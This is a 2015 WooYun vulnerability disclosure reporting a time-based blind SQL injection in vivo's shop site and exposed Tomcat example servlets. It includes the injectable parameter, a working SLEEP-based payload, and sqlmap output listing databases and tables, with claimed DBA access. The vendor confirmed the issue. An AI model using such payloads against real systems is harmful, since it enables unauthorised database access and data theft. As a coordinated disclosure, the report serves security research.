当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119872

漏洞标题:步步高商城sql注入+后台系统问题配置(dba权限获取数据库大量信息)

相关厂商:vivo智能手机

漏洞作者: 人丑嘴不甜

提交时间:2015-06-12 15:01

修复时间:2015-07-31 20:02

公开时间:2015-07-31 20:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

后台系统问题配置 和基于时间的盲注 dba权限 几乎跑遍全图

详细说明:

后台系统问题配置
http://supply.vivo.com.cn/examples/servlets/servlet/SessionExample;jsessionid=C44A64DEDD77CF24847E5919542A2DCE
/examples/servlets/servlet/SessionExample
Apache Tomcat version older than 6.0.36
版本过低
http://pop.vivo.com.cn/examples/servlets/servlet/SessionExample
pop.vivo.com.cn/loginOn.action
注入点

Place: POST
Parameter: cat_id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=22) AND SLEEP(5) AND (6138=6138&orderBy=1,(select case when 
(3*2*1=6 AND 000144=000144) then 1 else 1*(select table_name from 
information_schema.tables)end)=1&showtype=list&&virtual_cat_id=
---
[10:59:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
current database:    'vivo_swore'
Database: vivo_swore
[84 tables]
+-------------------------------------------------+
| Ansicht1                                        |
| LOCATION                                        |
| LT_JURISDICAO                                   |
| MM_USUARIOS_DO_PROCESSO                         |
| News                                            |
| Organization                                    |
| PostalAddress                                   |
| Property                                        |
| Publication                                     |
| QRTZ_FIRED_TRIGGERS                             |
| QRTZ_SIMPLE_TRIGGERS                            |
| Regions                                         |
| SCRIPT                                          |
| SPJ                                             |
| SubCategory                                     |
| TIL_IDIOTON                                     |
| basePlusCommissionEmployees                     |
| be_users                                        |
| belong                                          |
| binn_forum_threads                              |
| cdb_activities                                  |
| child_config_traffic_selector                   |
| countries                                       |
| dependent                                       |
| div_passport                                    |
| dtb_customer_mail_temp                          |
| dtb_customer_reading                            |
| edge                                            |
| enseignant                                      |
| exchangerate                                    |
| ezin_roles                                      |
| form_data_archive                               |
| forum_user_activity                             |
| friend                                          |
| games                                           |
| geo_Island                                      |
| geo_sea                                         |
| guava_group_assignments                         |
| gws_page                                        |
| invoice                                         |
| isDeleted_table                                 |
| isMember                                        |
| jforum_categories                               |
| jforum_topics                                   |
| job_history                                     |
| jos_banner                                      |
| jos_session                                     |
| jos_vm_module                                   |
| jos_weblinks                                    |
| loan                                            |
| locatedOn                                       |
| log                                             |
| logins                                          |
| mailaddresses                                   |
| nuke_comments                                   |
| nuke_links_newlink                              |
| nuke_stats_year                                 |
| oil_phocadownload_categories                    |
| oil_phocadownload_settings                      |
| osc_products_attributes_download                |
| osc_products_options_values_to_products_options |
| pagelinks                                       |
| pages                                           |
| pg_ts_dict                                      |
| phpbb_themes_name                               |
| phpbb_topics                                    |
| power                                           |
| problem                                         |
| rating_track                                    |
| spip_auteurs_messages                           |
| store1                                          |
| tbl_member                                      |
| tbl_works                                       |
| tblblogentriescategories                        |
| tbnguoidung                                     |
| triggers_template                               |
| user_un                                         |
| useraccount                                     |
| useraccounts                                    |
| users                                           |
| vcd_Images                                      |
| vcd_RssFeeds                                    |
| wh_der_children                                 |
| xplay3s                                         |
+-------------------------------------------------+
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0.11
[20:55:20] [INFO] fetching tables for database: 'vivo0307'
[20:55:20] [INFO] fetching number of tables for database 'vivo0307'
[20:55:20] [INFO] resumed: 171
[20:55:20] [INFO] resumed: sdb_aftersales_return_product
[20:55:20] [INFO] resumed: sdb_apiactionlog_apilog
[20:55:20] [INFO] resumed: sdb_b2c_brand
[20:55:20] [INFO] resumed: sdb_b2c_cart
[20:55:20] [INFO] resumed: sdb_b2c_cart_objects
[20:55:20] [INFO] resumed: sdb_b2c_college
[20:55:20] [INFO] resumed: sdb_b2c_comment_goods_point
[20:55:20] [INFO] resumed: sdb_b2c_comment_goods_type
[20:55:20] [INFO] resumed: sdb_b2c_contract_package
[20:55:20] [INFO] resumed: sdb_b2c_contract_package_numbers
[20:55:20] [INFO] resumed: sdb_b2c_counter
[20:55:20] [INFO] resumed: sdb_b2c_counter_attach
[20:55:20] [INFO] resumed: sdb_b2c_coupon_map\x11
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_info
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_list
[20:55:20] [INFO] resumed: sdb_b2c_coupon_vivo_xshot
[20:55:20] [INFO] resumed: sdb_b2c_coupons
[20:55:20] [INFO] resumed: sdb_b2c_delivery
[20:55:20] [INFO] resumed: sdb_b2c_delivery_items
[20:55:20] [INFO] resumed: sdb_b2c_dly_h_area
[20:55:20] [INFO] resumed: sdb_b2c_dlycorp
[20:55:20] [INFO] resumed: sdb_b2c_dlytype
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_award
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_log
[20:55:20] [INFO] resumed: sdb_b2c_flashlottery_winner
[20:55:20] [INFO] resumed: sdb_b2c_goods
[20:55:20] [INFO] resumed: sdb_b2c_goods_cat
[20:55:20] [INFO] resumed: sdb_b2c_goods_contract_package
[20:55:20] [INFO] resumed: sdb_b2c_goods_keywords
[20:55:20] [INFO] resumed: sdb_b2c_goods_lv_price
[20:55:20] [INFO] resuming partial value: sdb_b2c_goods_promotion

漏洞证明:

QQ图片20150604131816.png

QQ图片20150604131841.png

QQ图片20150604131816.png

11.png

QQ图片20150611151047.png

QQ图片20150611205356.png


查看权限dba

QQ图片20150611211118.png

修复方案:

辛苦你们了

版权声明:转载请注明来源 人丑嘴不甜@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-16 20:01

厂商回复:

感谢提醒和关注

最新状态:

暂无